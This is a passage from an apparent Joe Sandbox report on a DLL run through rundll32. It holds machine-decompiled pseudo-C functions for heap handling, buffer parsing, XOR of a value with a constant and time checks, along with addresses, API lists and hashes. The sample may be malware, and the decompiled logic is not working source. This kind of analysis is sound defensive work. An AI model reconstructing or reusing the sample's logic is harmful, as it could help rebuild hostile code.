                  				if (_t85 == 0) goto 0x80002068;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				if (_t85 != 0) goto 0x80001fef;
                  				if (_t85 >= 0) goto 0x80001fbb;
                  				memcpy(??, ??, ??);
                  				r8d = 0x60c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}



















                  0x180001eec
                  0x180001eec
                  0x180001eef
                  0x180001ef3
                  0x180001ef7
                  0x180001f03
                  0x180001f0a
                  0x180001f22
                  0x180001f2c
                  0x180001f31
                  0x180001f46
                  0x180001f51
                  0x180001f56
                  0x180001f6b
                  0x180001f76
                  0x180001f7b
                  0x180001f8a
                  0x180001f8f
                  0x180001f9a
                  0x180001fa0
                  0x180001fa8
                  0x180001faa
                  0x180001fb5
                  0x180001fbb
                  0x180001fc8
                  0x180001fd0
                  0x180001fd2
                  0x180001fde
                  0x180001fe2
                  0x180002006
                  0x18000200b
                  0x180002027
                  0x18000202c
                  0x180002036
                  0x180002038
                  0x18000205e
                  0x180002063
                  0x18000206f
                  0x18000207b
                  0x180002093
                  0x1800020a2
                  0x1800020a8
                  0x1800020b4
                  0x1800020da

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
                  • Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 34%
                  			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
                  				long long _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				intOrPtr _t40;
                  				void* _t56;
                  				void* _t57;
                  				intOrPtr _t67;
                  				intOrPtr _t69;
                  				intOrPtr* _t73;
                  				signed long long _t90;
                  				void* _t92;
                  				void* _t108;
                  				void* _t110;
                  				intOrPtr* _t112;
                  
                  				_t72 = __rbx;
                  				_a16 = __rbx;
                  				_a8 = __rcx;
                  				_t69 =  *0x8000d4a0;
                  				_t57 = r8d;
                  				_v72 =  *((intOrPtr*)(_t69 + 8));
                  				_t8 = _t90 + 8; // 0x8
                  				r14d = _t8;
                  				HeapAlloc(??, ??, ??);
                  				if (_t69 == 0) goto 0x8000627d;
                  				if (_t57 == 0) goto 0x800061f7;
                  				_t112 = __rdx + 0x20;
                  				E00000001180006008(__rbx, __rcx, _t92, __rdx + (__rbx + __rbx * 4) * 8);
                  				if (_t69 == 0) goto 0x800061ec;
                  				r9d =  *((intOrPtr*)(_t112 - 8));
                  				_v88 = _t69 + (_t90 + _t90 * 2) * 8;
                  				_a24 = E00000001180006344(_t69, _t72, _a8, _t69, _t92,  *_t112, _t108, _t110);
                  				HeapFree(??, ??, ??);
                  				_t40 = _a24;
                  				if (_t40 == 0) goto 0x800061ec;
                  				_t56 = 0 + _t40;
                  				if (1 - _t57 < 0) goto 0x80006176;
                  				r14d = 8;
                  				if (1 != _t57) goto 0x80006225;
                  				_v88 = _a64;
                  				r14d = E00000001180007444(_t40, _t56, _t72, _t69, _a48, _a56);
                  				if (_t56 == 0) goto 0x8000626f;
                  				_t31 =  &_a8; // 0x8
                  				_t73 = _t31;
                  				if ( *_t73 == 0) goto 0x8000624b;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t73 - 8)) == 0) goto 0x80006265;
                  				_t67 =  *((intOrPtr*)(_t73 + 0xc));
                  				if (_t67 == 0) goto 0x80006265;
                  				HeapFree(??, ??, ??);
                  				if (_t67 != 0) goto 0x80006238;
                  				HeapFree(??, ??, ??);
                  				return r14d;
                  			}


















                  0x180006108
                  0x180006108
                  0x18000610d
                  0x180006121
                  0x180006128
                  0x180006148
                  0x18000614d
                  0x18000614d
                  0x180006151
                  0x18000615d
                  0x180006167
                  0x180006172
                  0x180006184
                  0x18000618f
                  0x180006191
                  0x1800061ae
                  0x1800061c0
                  0x1800061c7
                  0x1800061cd
                  0x1800061d6
                  0x1800061e2
                  0x1800061ea
                  0x1800061f1
                  0x1800061f9
                  0x180006218
                  0x180006222
                  0x180006232
                  0x180006234
                  0x180006234
                  0x18000623e
                  0x180006245
                  0x180006252
                  0x180006254
                  0x180006258
                  0x18000625f
                  0x18000626d
                  0x180006277
                  0x180006297

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlen$Timelstrcatlstrcpy$FileSleepSystem_snprintf
                  • String ID:
                  • API String ID: 2523292596-0
                  • Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
                  • Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E00000001180007DBC(void* __edx, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                  				intOrPtr _v80;
                  				void* _v88;
                  				long _v96;
                  				signed int _v104;
                  				long long _v112;
                  				long long _v120;
                  				void* __rbx;
                  				void* __rsi;
                  				void* __rbp;
                  				signed int _t55;
                  				signed int _t63;
                  				void* _t64;
                  				void* _t71;
                  				void* _t73;
                  				signed int _t74;
                  				void* _t75;
                  				void* _t76;
                  				void* _t85;
                  				signed long long _t107;
                  				struct _FILETIME* _t110;
                  				void* _t128;
                  				void* _t129;
                  				long _t131;
                  				signed int _t132;
                  				void* _t135;
                  				void* _t137;
                  				void* _t147;
                  				void* _t148;
                  				void* _t149;
                  				signed int* _t150;
                  				long long _t151;
                  				void* _t153;
                  				signed long long _t155;
                  				void* _t157;
                  
                  				_t148 = _t137;
                  				 *((long long*)(_t148 + 0x18)) = __r8;
                  				 *((long long*)(_t148 + 0x10)) = __rdx;
                  				 *(_t148 + 0x20) =  *(_t148 + 0x20) & 0x00000000;
                  				r14d = 0;
                  				_v104 =  *0x8000d498;
                  				_t129 = __rcx;
                  				 *(_t148 - 0x58) =  *(_t148 - 0x58) & _t155;
                  				if (E00000001180001CB0(_t110, __rcx, _t148 - 0x60, _t135, _t148 + 8, _t157, _t155) == 0) goto 0x80007e19;
                  				_t11 = _t155 + 1; // 0x1
                  				r12d = _t11;
                  				_v96 = _t131;
                  				goto 0x80007e24;
                  				_t132 = _v96;
                  				r12d = 2;
                  				_t14 =  &_a32; // 0xba
                  				_t15 =  &_v88; // 0x42
                  				if (E00000001180008034(_t71, r12d, _t85, _t110, _t129, _t132, _t135, _t15, _t14, _t153, _t149) != 0) goto 0x80007fff;
                  				r8d = _a32;
                  				r13d = r8d;
                  				r13d = r13d - r12d;
                  				_t150 = _v88;
                  				if (_t132 == 0) goto 0x80007e7d;
                  				_t55 = _a8;
                  				_t150[0xa] = 1;
                  				_t150[0x12] = _t132;
                  				_t150[0xd] = _t55;
                  				_t150[0x10] = _t55;
                  				_t24 = _t129 + 0xb0; // 0xb0
                  				r9d = 0;
                  				 *_t150 = _v104 ^ 0x62ade362;
                  				_t150[3] =  *(_t129 + 0x48);
                  				_t150[2] =  *(_t129 + 0x4c);
                  				_t29 =  &_a8; // 0xa2
                  				_v112 = _t29;
                  				_t31 =  &_v104; // 0x32
                  				_v120 = _t31;
                  				_t73 = E0000000118000970C(_t54, _t110, _t24, _t150, _t132, _t15, _t14, _t148);
                  				HeapFree(_t128, _t131, _t135);
                  				if (r13d == 0) goto 0x80007eef;
                  				if (_t73 == 0) goto 0x80007ee4;
                  				if (_t73 != 0x10d2) goto 0x80007eef;
                  				E000000011800023B8(r13d, _t110, _t129, _t132, _t135);
                  				if (_t73 != 0) goto 0x80007fff;
                  				_t74 = _a8;
                  				_t151 = _v104;
                  				r13d =  *(_t129 + 0x4c);
                  				_t63 = E00000001180008C48(_t74, _t151);
                  				_t36 =  &_a8; // 0xa2
                  				r9d = 1;
                  				 *(_t129 + 0x48) = _t74;
                  				 *(_t129 + 0x4c) = _t63;
                  				_t64 = E000000011800099F4(_t76, _t110, _t129, _t151, _t132, _t135, _t36, _t147, _t148);
                  				_t75 = _t64;
                  				if (_t64 != 0) goto 0x80007fef;
                  				 *_a16 = _t151;
                  				 *_a24 = _a8;
                  				if ( *(_t129 + 0x4c) != r13d) goto 0x80007f62;
                  				r14d = 1;
                  				if ( *((intOrPtr*)(_t129 + 0x60)) == 0) goto 0x80007fb5;
                  				GetSystemTimeAsFileTime(_t110);
                  				if (r14d == 0) goto 0x80007fa2;
                  				_t107 =  *((intOrPtr*)(_t129 + 0x58));
                  				if (_v80 - _t107 <= 0) goto 0x80007fa2;
                  				_t47 = _t129 + 0xb0; // 0xb0
                  				if (E000000011800045E8(_t75, _t107, _t110, _t47, _t132, _t135) != 0) goto 0x80007fa2;
                  				asm("lock or dword [edi+0xdc], 0x1");
                  				 *((long long*)(_t129 + 0x58)) = _t107 * 0x23c34600 + _v80;
                  				if (_v96 == 0) goto 0x80007fdc;
                  				HeapFree(??, ??, ??);
                  				if (_t75 == 0) goto 0x80007fd4;
                  				if (_t75 != 0x10d2) goto 0x80007fdc;
                  				E00000001180008BC4(_t110, _t129, _v96);
                  				return _t75;
                  			}





































                  0x180007dbc
                  0x180007dbf
                  0x180007dc3
                  0x180007dde
                  0x180007df5
                  0x180007df8
                  0x180007dfc
                  0x180007dff
                  0x180007e0a
                  0x180007e0e
                  0x180007e0e
                  0x180007e12
                  0x180007e17
                  0x180007e19
                  0x180007e1e
                  0x180007e24
                  0x180007e2c
                  0x180007e40
                  0x180007e46
                  0x180007e4e
                  0x180007e51
                  0x180007e54
                  0x180007e5c
                  0x180007e5e
                  0x180007e65
                  0x180007e6e
                  0x180007e73
                  0x180007e78
                  0x180007e81
                  0x180007e88
                  0x180007e93
                  0x180007e9a
                  0x180007ea2
                  0x180007ea7
                  0x180007eaf
                  0x180007eb4
                  0x180007eb9
                  0x180007ecb
                  0x180007ecd
                  0x180007ed6
                  0x180007eda
                  0x180007ee2
                  0x180007eea
                  0x180007ef1
                  0x180007ef7
                  0x180007efe
                  0x180007f03
                  0x180007f0c
                  0x180007f11
                  0x180007f19
                  0x180007f25
                  0x180007f28
                  0x180007f2b
                  0x180007f30
                  0x180007f34
                  0x180007f4a
                  0x180007f54
                  0x180007f5a
                  0x180007f5c
                  0x180007f66
                  0x180007f6d
                  0x180007f76
                  0x180007f78
                  0x180007f81
                  0x180007f83
                  0x180007f93
                  0x180007f95
                  0x180007fb1
                  0x180007fb8
                  0x180007fc2
                  0x180007fca
                  0x180007fd2
                  0x180007fd7
                  0x180007fee

                  APIs
                    • Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
                    • Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
                    • Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77
                  • HeapFree.KERNEL32 ref: 0000000180007ECD
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
                  • HeapFree.KERNEL32 ref: 0000000180007FC2
                  • HeapFree.KERNEL32 ref: 0000000180007FF7
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
                  • String ID:
                  • API String ID: 2852518528-0
                  • Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
                  • Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseEventFreeHandleHeapSleep
                  • String ID:
                  • API String ID: 1881548302-0
                  • Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
                  • Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0000000118000137C(signed int __esi, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
                  				void* __rbp;
                  				intOrPtr _t29;
                  				void* _t32;
                  				void* _t38;
                  				void* _t42;
                  				void* _t54;
                  				void* _t55;
                  				intOrPtr _t56;
                  				void* _t60;
                  				void* _t61;
                  				void* _t65;
                  				signed int _t73;
                  				void* _t105;
                  				void* _t113;
                  				intOrPtr _t126;
                  				long long _t130;
                  				char* _t133;
                  				intOrPtr* _t140;
                  				long _t143;
                  				long _t145;
                  				void* _t148;
                  				void* _t150;
                  				void* _t151;
                  				intOrPtr* _t155;
                  				char* _t162;
                  				void* _t164;
                  				void* _t171;
                  				long _t173;
                  				int _t176;
                  				void* _t180;
                  				void* _t182;
                  
                  				_t164 = __r10;
                  				_t140 = __rdx;
                  				_t130 = __rcx;
                  				 *((long long*)(_t150 + 0x10)) = __rbx;
                  				 *((long long*)(_t150 + 8)) = __rcx;
                  				_t151 = _t150 - 0x60;
                  				_t126 =  *0x8000d4a0;
                  				r14d = r8d;
                  				if (r8d == 0) goto 0x8000160a;
                  				_t73 = __esi | 0xffffffff;
                  				r11d = 0;
                  				r10d = 0;
                  				_t29 =  *__rdx;
                  				if (_t29 == 0xd) goto 0x80001419;
                  				if (_t29 == 0xa) goto 0x80001419;
                  				if (0 != 0) goto 0x800013ef;
                  				if (_t29 == 0x20) goto 0x800013f1;
                  				if (_t29 == 9) goto 0x800013f1;
                  				goto 0x800013f1;
                  				if (_t29 != 0x3b) goto 0x800013fd;
                  				if (r11d != 0) goto 0x8000141d;
                  				r11d = 1;
                  				if (_t29 != 0x3d) goto 0x80001407;
                  				if (0 != 0) goto 0x8000141d;
                  				if (_t29 != 0x7c) goto 0x8000141d;
                  				if (r10d != 0) goto 0x8000141d;
                  				if (1 != 0) goto 0x8000141d;
                  				r10d = 1;
                  				goto 0x8000141d;
                  				if (1 != 0) goto 0x80001424;
                  				if (1 != 0) goto 0x800013ce;
                  				if (__rdx == _t143) goto 0x8000160a;
                  				r13d = r13d - r8d;
                  				r13d = r13d - 1;
                  				r14d = r14d + r13d;
                  				r13d = 1;
                  				if (r11d == 1) goto 0x800015fb;
                  				if (1 == 0) goto 0x80001459;
                  				r12d = 1;
                  				_t5 = _t140 - 1; // -1
                  				_t54 = _t5;
                  				goto 0x8000145c;
                  				_t173 = _t143;
                  				if (_t54 == 0) goto 0x80001605;
                  				if (r10d == 0) goto 0x800014db;
                  				_t6 = _t164 - 1; // -1
                  				_t60 = _t6;
                  				if (_t60 == 0) goto 0x800014db;
                  				_t31 =  <  ? _t60 : 0x10;
                  				if (0x10 == 0) goto 0x800014ab;
                  				r9b =  *__rdx;
                  				if (r9b == dil) goto 0x800014ab;
                  				if (r9b == 0x20) goto 0x800014ab;
                  				_t105 = r9b - 9;
                  				if (_t105 == 0) goto 0x800014ab;
                  				 *((intOrPtr*)(_t151 + 0x30 - __rdx + __rdx)) = r9b;
                  				if (_t105 != 0) goto 0x8000148c;
                  				_t61 = _t60 + 1;
                  				_t32 = ( <  ? _t60 : 0x10) - 0x10 + _t73;
                  				 *((intOrPtr*)(_t151 + _t126 + 0x30)) = dil;
                  				_t162 = _t61 + __rdx;
                  				if ( *_t162 == 0x20) goto 0x800014c6;
                  				if ( *_t162 != 9) goto 0x800014cd;
                  				goto 0x800014ba;
                  				r9b =  *((intOrPtr*)(_t151 + 0x30));
                  				_t155 = __rdx + _t126;
                  				_t55 = _t54 - _t61 + 1;
                  				goto 0x800014e3;
                  				r9b = dil;
                  				 *((intOrPtr*)(_t151 + 0x30)) = dil;
                  				_t64 =  <  ? _t55 : 0x10;
                  				r11d = 0x10;
                  				if (0x10 == 0) goto 0x80001524;
                  				_t56 =  *_t155;
                  				if (_t56 == dil) goto 0x80001524;
                  				if (_t56 == 0x20) goto 0x80001524;
                  				if (_t56 == 9) goto 0x80001524;
                  				_t14 = _t130 - 0x61; // -96
                  				_t113 = _t14 - 0x19;
                  				if (_t113 > 0) goto 0x80001518;
                  				 *((char*)(_t151 + 0x48 - _t155 + _t155)) = _t56 + 0xe0;
                  				r11d = r11d + _t73;
                  				if (_t113 != 0) goto 0x800014fc;
                  				_t65 = ( <  ? _t55 : 0x10) - r11d;
                  				 *((intOrPtr*)(_t151 + __rdx + 0x48)) = dil;
                  				if (r9b != dil) goto 0x80001546;
                  				r8d = 0x10;
                  				memcpy(_t182, _t180, _t176);
                  				if (_t173 == _t143) goto 0x80001591;
                  				if (1 <= 0) goto 0x80001568;
                  				if ( *_t173 == 0x20) goto 0x8000155f;
                  				if ( *_t173 != 9) goto 0x80001568;
                  				if (1 - 1 < 0) goto 0x80001551;
                  				if (1 == 1) goto 0x80001593;
                  				_t38 = _t148 - 1;
                  				if (_t38 <= 0) goto 0x8000158c;
                  				_t133 = _t38 + _t173 + 1;
                  				if ( *_t133 == 0x20) goto 0x80001583;
                  				if ( *_t133 != 9) goto 0x8000158c;
                  				if (_t38 + _t73 > 0) goto 0x80001579;
                  				goto 0x80001593;
                  				_t22 = _t148 + 1; // 0x1
                  				r8d = _t22;
                  				HeapAlloc(_t171, _t143, _t145);
                  				if (_t126 == _t143) goto 0x800015f8;
                  				r8d = 0;
                  				memcpy(_t148, ??);
                  				 *((intOrPtr*)(__rbx + _t126)) = dil;
                  				_t42 = E00000001180008C48(0xffffffff, _t151 + 0x48);
                  				r9d = 0;
                  				 *((long long*)(_t151 + 0x20)) = _t151 + 0x30;
                  				E00000001180005748(_t56 + 0xe0, _t42, __rbx,  *((intOrPtr*)(_t151 + 0xa0)), _t173 + 1, _t126);
                  				HeapFree(??, ??, ??);
                  				if (r14d == 0) goto 0x8000160a;
                  				goto 0x800013bb;
                  				return 0xb;
                  			}


































                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x180001381
                  0x180001391
                  0x180001395
                  0x18000139e
                  0x1800013ab
                  0x1800013b8
                  0x1800013c8
                  0x1800013cb
                  0x1800013ce
                  0x1800013d3
                  0x1800013d7
                  0x1800013db
                  0x1800013df
                  0x1800013e3
                  0x1800013ed
                  0x1800013f3
                  0x1800013f8
                  0x1800013fa
                  0x1800013ff
                  0x180001403
                  0x180001409
                  0x18000140e
                  0x180001412
                  0x180001414
                  0x180001417
                  0x18000141b
                  0x180001422
                  0x180001427
                  0x18000142d
                  0x180001430
                  0x180001433
                  0x180001436
                  0x180001440
                  0x180001448
                  0x18000144c
                  0x18000144f
                  0x18000144f
                  0x180001457
                  0x180001459
                  0x18000145e
                  0x180001467
                  0x180001469
                  0x180001469
                  0x18000146f
                  0x18000147b
                  0x180001482
                  0x18000148c
                  0x180001492
                  0x180001498
                  0x18000149a
                  0x18000149e
                  0x1800014a0
                  0x1800014a9
                  0x1800014ab
                  0x1800014ad
                  0x1800014b2
                  0x1800014b7
                  0x1800014be
                  0x1800014c4
                  0x1800014cb
                  0x1800014cd
                  0x1800014d4
                  0x1800014d7
                  0x1800014d9
                  0x1800014db
                  0x1800014de
                  0x1800014ea
                  0x1800014ed
                  0x1800014f2
                  0x1800014fc
                  0x180001502
                  0x180001507
                  0x18000150c
                  0x18000150e
                  0x180001511
                  0x180001513
                  0x180001518
                  0x18000151f
                  0x180001522
                  0x180001524
                  0x180001527
                  0x18000152f
                  0x18000153b
                  0x180001541
                  0x180001549
                  0x18000154f
                  0x180001556
                  0x18000155d
                  0x180001566
                  0x18000156a
                  0x18000156c
                  0x180001574
                  0x180001576
                  0x18000157c
                  0x180001581
                  0x18000158a
                  0x18000158f
                  0x180001593
                  0x180001593
                  0x18000159c
                  0x1800015a8
                  0x1800015aa
                  0x1800015b5
                  0x1800015c2
                  0x1800015c6
                  0x1800015d3
                  0x1800015e0
                  0x1800015e5
                  0x1800015f2
                  0x1800015fe
                  0x180001600
                  0x180001623

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heapmemcpy$AllocFree
                  • String ID:
                  • API String ID: 1496448200-0
                  • Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
                  • Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E00000001180001208(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
                  				char _v48;
                  				long long _v56;
                  				long long _t43;
                  				long long _t57;
                  				long long _t58;
                  				void* _t68;
                  				long long* _t73;
                  				void* _t75;
                  
                  				_t56 = __rdx;
                  				_a16 = __rbx;
                  				_a24 = __rbp;
                  				_a32 = __rsi;
                  				_t43 =  *0x8000d4a0;
                  				r12d = r8d;
                  				_t75 = __rdx;
                  				if (__rdx == _t57) goto 0x80001304;
                  				if (r8d == 0) goto 0x80001304;
                  				EnterCriticalSection(??);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(??);
                  				_t7 =  &_a8; // -110
                  				r8d = 0;
                  				_v48 = 0;
                  				_a8 = 0;
                  				_v56 = _t57;
                  				if (E00000001180009994(r12d, __rdx, __rdx, _t68, _t7) != 0x7a) goto 0x800012fd;
                  				r8d = _a8;
                  				HeapAlloc(??, ??, ??);
                  				_t58 = _t43;
                  				if (_t43 == 0) goto 0x800012f8;
                  				_v48 = 0x10;
                  				_t14 =  &_a8; // -110
                  				_t73 = _t14;
                  				_v56 = __rcx + 0x72;
                  				if (E00000001180009994(r12d, _t75, _t56, _t43, _t73) != 0) goto 0x800012e8;
                  				 *__r9 = _t58;
                  				 *_a40 = _a8;
                  				goto 0x800012fd;
                  				HeapFree(??, ??, ??);
                  				goto 0x800012fd;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				goto 0x80001313;
                  				 *_t73 = _t58;
                  				 *_a40 = 0;
                  				return 0;
                  			}











                  0x180001208
                  0x180001208
                  0x18000120d
                  0x180001212
                  0x180001224
                  0x180001237
                  0x18000123a
                  0x180001243
                  0x18000124c
                  0x180001256
                  0x18000125c
                  0x180001265
                  0x18000126b
                  0x180001270
                  0x180001279
                  0x18000127d
                  0x180001281
                  0x180001290
                  0x180001292
                  0x18000129c
                  0x1800012a2
                  0x1800012a8
                  0x1800012ae
                  0x1800012b6
                  0x1800012b6
                  0x1800012bb
                  0x1800012d2
                  0x1800012e0
                  0x1800012e4
                  0x1800012e6
                  0x1800012f0
                  0x1800012f6
                  0x1800012fd
                  0x180001302
                  0x18000130c
                  0x180001311
                  0x180001331

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeave
                  • String ID:
                  • API String ID: 2939682908-0
                  • Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
                  • Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E000000011800081F0(void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
                  				signed int _t21;
                  				signed int _t28;
                  				signed int* _t38;
                  				int _t53;
                  				long long _t58;
                  				void* _t61;
                  				void* _t72;
                  				signed int* _t73;
                  				long _t75;
                  				long _t78;
                  				void* _t81;
                  
                  				 *((long long*)(_t61 + 8)) = __rbx;
                  				 *((long long*)(_t61 + 0x10)) = _t58;
                  				 *((long long*)(_t61 + 0x18)) = __rsi;
                  				_t21 =  *__rcx & 0x0000ffff;
                  				_t38 = __rbx + 4;
                  				r11d = __edx;
                  				r10d = 0x57;
                  				if (__r11 - _t38 <= 0) goto 0x800082e1;
                  				_t28 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
                  				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
                  				if (_t21 == 0) goto 0x800082e1;
                  				if (_t21 - 0x200 > 0) goto 0x800082e1;
                  				if (_t28 == 0) goto 0x800082e1;
                  				if (_t28 - 0x200 > 0) goto 0x800082e1;
                  				r15d = 0x404;
                  				HeapAlloc(_t81, _t78, _t75);
                  				_t73 = _t38;
                  				if (_t38 == 0) goto 0x800082db;
                  				memset(_t72, _t53);
                  				 *_t73 = (_t21 & 0x0000fff0) << 3;
                  				memcpy(??, ??, ??);
                  				memcpy(??, ??, ??);
                  				 *__r8 = _t73;
                  				 *__r9 = r15d;
                  				r10d = 0;
